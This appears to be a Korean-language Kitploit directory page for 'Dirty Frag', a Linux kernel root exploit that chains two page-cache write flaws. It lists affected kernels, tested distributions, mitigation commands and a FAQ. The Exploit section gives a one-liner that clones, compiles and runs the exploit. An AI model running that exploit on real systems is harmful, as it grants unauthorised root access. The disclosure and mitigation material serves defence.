Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
dirtyfrag — 리눅스 커널 권한 상승 익스플로잇으로, 두 개의 페이지 캐시 쓰기 취약점(CVE-2026-43284, CVE-2026-43500)을 연쇄적으로 활용하여 경쟁 조건 없이 주요 배포판에서 결정적인 루트 접근 권한을 획득합니다. | Kitploit
도구/GitHubGitHub/v4bel/dirtyfrag
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubv4bel/dirtyfrag

dirtyfrag

리눅스 커널 권한 상승 익스플로잇으로, 두 개의 페이지 캐시 쓰기 취약점(CVE-2026-43284, CVE-2026-43500)을 연쇄적으로 활용하여 경쟁 조건 없이 주요 배포판에서 결정적인 루트 접근 권한을 획득합니다.

저장소 보기
5.0k78394개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Dirty Frag: 범용 리눅스 LPE

tux

개요

tux

이 문서는 Hyunwoo Kim (@v4bel)이 처음 발견하고 보고한 Dirty Frag 취약점 클래스를 설명합니다. 이 취약점은 xfrm-ESP Page-Cache Write (CVE-2026-43284) 취약점과 RxRPC Page-Cache Write (CVE-2026-43500) 취약점을 연결하여 주요 리눅스 배포판에서 루트 권한을 획득할 수 있습니다.

Dirty Frag는 Dirty Pipe와 Copy Fail이 속한 버그 클래스를 확장한 사례입니다. 타이밍 윈도우에 의존하지 않는 결정적 로직 버그이므로 경쟁 조건(race condition)이 필요 없고, 익스플로잇이 실패해도 커널이 패닉하지 않으며 성공률이 매우 높습니다.

자세한 기술 정보와 타임라인은 여기를 참조하세요.

  • xfrm-ESP Page-Cache Write (CVE-2026-43284)는 메인라인 f4c50a4034e6에서 패치되었습니다.
  • RxRPC Page-Cache Write (CVE-2026-43500)는 메인라인 aa54b1d27fe0에서 패치되었습니다.

[!NOTE] 이 문서가 처음 공개된 시점(2026-05-07)에는 외부 요인으로 인해 엠바고가 이미 깨져 있었기 때문에 아직 패치나 CVE가 존재하지 않았습니다. 당시 [email protected]에서 메인테이너들과 협의한 후, 그들의 요청에 따라 Dirty Frag 문서가 게시되었습니다. 공개 타임라인은 기술 상세 문서를 참조하세요.

익스플로잇

원라이너

root@kitploit:~
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

이 PoC는 linux-distros와의 협의에 따라 정확한 정보로 제공됩니다. 테스트 권한이 없는 시스템에서는 사용하지 마세요.

정리

⚠️ 중요: 이 익스플로잇을 실행한 후에는 페이지 캐시가 오염됩니다. 오염된 페이지 캐시를 정리하고 시스템 안정성을 보장하려면 다음 중 하나를 실행하세요:

root@kitploit:~
echo 3 > /proc/sys/vm/drop_caches

또는 시스템을 재부팅하세요.

영향받는 버전

  • CVE-2026-43284: xfrm-ESP Page-Cache Write 취약점은 cac2661c53f3 (2017-01-17)부터 f4c50a4034e6 (2026-05-05)까지 적용 범위에 해당합니다.
  • CVE-2026-43500: RxRPC Page-Cache Write 취약점은 2dc334f1a63a (2023-06-08)부터 aa54b1d27fe0 (2026-05-10)까지 적용 범위에 해당합니다.

즉, 이 취약점들의 실질 유효 수명은 약 9년입니다.

이 Dirty Frag는 다음 배포판 버전에서 테스트되었습니다.

  • Ubuntu 24.04.4: 6.17.0-23-generic
  • RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
  • openSUSE Tumbleweed: 7.0.2-1-default
  • CentOS Stream 10: 6.12.0-224.el10.x86_64
  • AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
  • Fedora 44: 6.19.14-300.fc44.x86_64
  • ...

완화

  1. 다음 명령어를 사용하여 취약점이 발생하는 모듈을 제거하고 페이지 캐시를 정리하세요.
root@kitploit:~
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
  1. 각 배포판에서 패치를 백포트하면 그에 맞춰 업데이트하세요.

FAQ

왜 두 취약점을 체이닝했나요?

xfrm-ESP Page-Cache Write는 Copy Fail과 같은 강력한 임의 4바이트 STORE 프리미티브를 제공하며 대부분의 배포판에 포함되어 있지만, 네임스페이스를 생성할 권한이 필요합니다.

Ubuntu는 때때로 AppArmor 정책을 통해 권한 없는 사용자 네임스페이스 생성을 차단합니다. 이러한 환경에서는 xfrm-ESP Page-Cache Write를 트리거할 수 없습니다. RxRPC Page-Cache Write는 네임스페이스를 생성할 권한이 필요하지 않지만, rxrpc.ko 모듈 자체는 대부분의 배포판에 포함되어 있지 않습니다. 그러나 Ubuntu에서는 rxrpc.ko 모듈이 기본적으로 로드됩니다.

두 변종을 체이닝하면 사각지대가 서로를 보완하여 모든 주요 배포판에서 루트 권한을 획득할 수 있습니다. 자세한 내용은 기술 상세 문서를 참조하세요.

또 다른 "브랜드" "Dirty" 시리즈인가요?

네, 네, 알아요. 하지만 이 취약점은 "Dirty Pipe"의 후손이며, struct sk_buff의 frag 멤버를 "더럽히는(dirty)" 버그 클래스이므로 이 이름이 가장 적절합니다.

"Copy Fail" 취약점과 어떤 관계인가요?

Copy Fail은 이 연구를 시작하게 된 동기였습니다. 특히 Dirty Frag 취약점 체인의 xfrm-ESP Page-Cache Write는 Copy Fail과 동일한 싱크(sink)를 공유합니다. 그러나 algif_aead 모듈 사용 가능 여부와 관계없이 트리거됩니다. 즉, 공개된 Copy Fail 완화 조치(algif_aead 블랙리스트)가 적용된 시스템에서도 여러분의 리눅스는 여전히 Dirty Frag에 취약합니다.

그렇다면 리눅스를 어떻게 고치나요?

위의 완화(Mitigation) 섹션을 참조하세요.

도구 다운로드